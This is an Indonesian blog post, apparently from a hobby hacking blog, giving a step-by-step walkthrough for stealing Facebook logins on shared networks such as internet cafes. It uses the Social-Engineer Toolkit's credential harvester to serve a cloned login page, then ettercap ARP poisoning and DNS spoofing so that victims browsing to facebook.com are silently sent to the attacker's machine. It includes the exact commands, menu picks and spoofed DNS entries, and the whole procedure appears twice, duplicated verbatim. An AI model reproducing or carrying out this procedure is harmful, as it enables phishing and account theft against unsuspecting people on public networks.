Cari Blog Ini
Mengenai Saya
My Best Friend
Arsip Blog
-
▼
2013
(179)
-
▼
April
(45)
- Belajar Menggunakan Microsoft Telnet
- Wireless Security (Hacking Wifi)
- hack WiFi dengan CMD di windows
- Hack Sinyal Modem 3G Dengan Kaleng Blueband dan Po...
- Hack Download 4shared - Bypass 4shared Download time
- Cara Bypass/hack Adfly di Google Chrome dan Mozilla
- Cara Hack/menjebol password file pdf
- cara mengedit laman bawah template
- cara membuat text shadow
- Mengganti Tampilan Thread Comment
- CARA Mengetahui Hosting Blog
- PERBEDAAN Blog dan Website
- TIPS Optimalisasi Blog Terhadap Google Penguin
- 4 Gaya Menulis Di Blog Yang Perlu Kita Ketahui
- Jurus Jitu NgeHack WiFi
- Cara Ngehack Akun Blogger Gmail Di Website 100% Ampuh
- CARA SHUTDOWN KOMPUTER ORANG LAIN DENGAN CMD
- CARA NGEHACK ID POINTBLANK GAME
- CARA HACK FACEBOOK DENGAN Pro Facebook Hack v.2.0
- TIPS AGAR FILE KITA TIDAK DIREMOVE OLEH MEDIA FIRE
- SITUS HACKING
- CARA MEMUTUSKAN KONEKSI INTERNET ORANG LAIN DI WARNET
- hack account facebook dan twitter dengan SOCIAL-EN...
- cara mengetahui password dengan inspect element
- Mengganti Read More dengan Icon/Image
- CARA NGEBLOG LEWAT PONSEL
- Problem Pada Verifikasi Kotak Komentar
- CARA MENYISIPKAN TOMBOL PDF CREATOR DI BLOG
- Bikin Form Tanya Jawab Pribadi
- Hal-hal Yang Harus Diperhatikan Dalam Mengganti Te...
- Web Hosting Murah, Lengkap dan Berkualitas
- Cara men-Daftar-kan Blog ke 40 Mesin Cari (Search ...
- KOMENTAR DI BLOG PENTING GAG?
- Tips bagaimana cara Memilih Template blogger blogs...
- Cara Menghilangkan Underline Link Blogger Blogspot
- Tips Cara Edit Foto
- Cara Mengetahui Siapa Ngelink Blog Anda?
- HIGHLIGHT POST DENGAN SELECT ALL
- MENAMPILKAN KOMENTAR OWNER BLOG BERBEDA
- CARA MENONJOLKAN TEKS TERTENTU PADA POSTINGAN
- CARA MENGHILANGKAN WIDGET ATTRIBUTION BLOGER
- CARA MENAMPILKAN WIDGET DI HALAMAN TERTENTU
- CARA MEMBACKUP TEMPLATE
- CARA MEMBUAT LINK DALAM POSTINGAN
- CARA MENGGANTI PAVICON
-
▼
April
(45)
Diberdayakan oleh Blogger.
Label
- BISNIS ONLINE (5)
- Blogging (134)
- hacking (16)
- tips blog (21)
Traffic Visitor
7 Apr 2013
kali ini saya akan share tentang SET atau Social-Engineering Toolkit beserta Videonya ( dibawah )..
SET ini sudah tersedia di Backtrack 5 ...
ini sejenis fake login yang alamatnya adalah ip address kita...
jadi kebelet pngen ke warnet / hotspot hahaha..
oke mulai ....
Pertama buka terminal..
1. cd /pentest/exploits/set (enter)
2. ./set (enter)
3. pilih Social-Engineering Attacks dengan cara tekan angka 1
4. pilih Website Attack Vectors tekan 2
5. pilih Credential Harvester Attack Method tekan 3
6. pilih Web Templates tekan 1
jika memilih Site Cloner kita perlu memasukan alamat web yang akan kita buat menjadi fake login, dan jika web templates kita tinggal memilih yang sudah disediakan oleh SET itu sendiri, facebook contohnya...
7. tinggal pilih template yg mana, untuk contoh kita coba facebook, pilih 4
8. Press {return} to continue. tekan enter..
[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
berarti SET sudah selesai....etss jangan di close.. :p nanti passwordnya muncul di bawah itu..
Bagaimana SET akan bekerja ? jika korban memubuka alamat http://ipadresskita atau http://192.168.0.3 misalnya maka tampilannya akan seperti facebook, dan ketika korban login , akan terkirim ussername and password ke terminal kita...( untuk melihat ip address , lakukan perintah ifconfig pada terminal)
Tapi sangat tipis kemungkinan korban mengakses http://192.168.0.3 , lalu bagaimana agar korban dapat membuka http://192.168.0.3 / ip address kita ?? lakukan saja DNS SPOOFING...
oke kita buat agar setiap korban mengakses http://www.facebook.com akan beralih ke http://192.168.0.3.
korban tidak akan curiga karena url tetap www.facebook.com dan tampilannya pun sama persis...
1. buka etter dns dengan perintah gedit /usr/local/share/ettercap/etter.dns
2. edit menjadi :
facebook.com A 192.168.0.3
*.facebook.com A 192.168.0.3
192.168.0.3 itu contoh ip saya...
setelah itu save..
3. jalankan dns spoofing dengan perintah
ettercap -Tqi (interfaces) -P dns_spoof -M ARP // //
interfaces saya eth0 ( lihat di ifconfig ) jadi perintahnya seperti ini :
ettercap -Tqi eth0 -P dns_spoof -M ARP // //
setelah itu , kita buka terminal yang pertama (SET)
kita tunggu sampai korban login..nanti akan ada email dan password , silahkan gunakan dengan bijak :p
jika kurang mengerti lihat Video saya :
SET ini sudah tersedia di Backtrack 5 ...
ini sejenis fake login yang alamatnya adalah ip address kita...
jadi kebelet pngen ke warnet / hotspot hahaha..
oke mulai ....
Pertama buka terminal..
1. cd /pentest/exploits/set (enter)
2. ./set (enter)
3. pilih Social-Engineering Attacks dengan cara tekan angka 1
4. pilih Website Attack Vectors tekan 2
5. pilih Credential Harvester Attack Method tekan 3
6. pilih Web Templates tekan 1
jika memilih Site Cloner kita perlu memasukan alamat web yang akan kita buat menjadi fake login, dan jika web templates kita tinggal memilih yang sudah disediakan oleh SET itu sendiri, facebook contohnya...
7. tinggal pilih template yg mana, untuk contoh kita coba facebook, pilih 4
8. Press {return} to continue. tekan enter..
[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
berarti SET sudah selesai....etss jangan di close.. :p nanti passwordnya muncul di bawah itu..
Bagaimana SET akan bekerja ? jika korban memubuka alamat http://ipadresskita atau http://192.168.0.3 misalnya maka tampilannya akan seperti facebook, dan ketika korban login , akan terkirim ussername and password ke terminal kita...( untuk melihat ip address , lakukan perintah ifconfig pada terminal)
Tapi sangat tipis kemungkinan korban mengakses http://192.168.0.3 , lalu bagaimana agar korban dapat membuka http://192.168.0.3 / ip address kita ?? lakukan saja DNS SPOOFING...
oke kita buat agar setiap korban mengakses http://www.facebook.com akan beralih ke http://192.168.0.3.
korban tidak akan curiga karena url tetap www.facebook.com dan tampilannya pun sama persis...
1. buka etter dns dengan perintah gedit /usr/local/share/ettercap/etter.dns
2. edit menjadi :
facebook.com A 192.168.0.3
*.facebook.com A 192.168.0.3
192.168.0.3 itu contoh ip saya...
setelah itu save..
3. jalankan dns spoofing dengan perintah
ettercap -Tqi (interfaces) -P dns_spoof -M ARP // //
interfaces saya eth0 ( lihat di ifconfig ) jadi perintahnya seperti ini :
ettercap -Tqi eth0 -P dns_spoof -M ARP // //
setelah itu , kita buka terminal yang pertama (SET)
kita tunggu sampai korban login..nanti akan ada email dan password , silahkan gunakan dengan bijak :p
jika kurang mengerti lihat Video saya :
Langganan:
Posting Komentar
(Atom)
0 komentar:
Posting Komentar
anda sopan ,kami segan, Thank's for u coment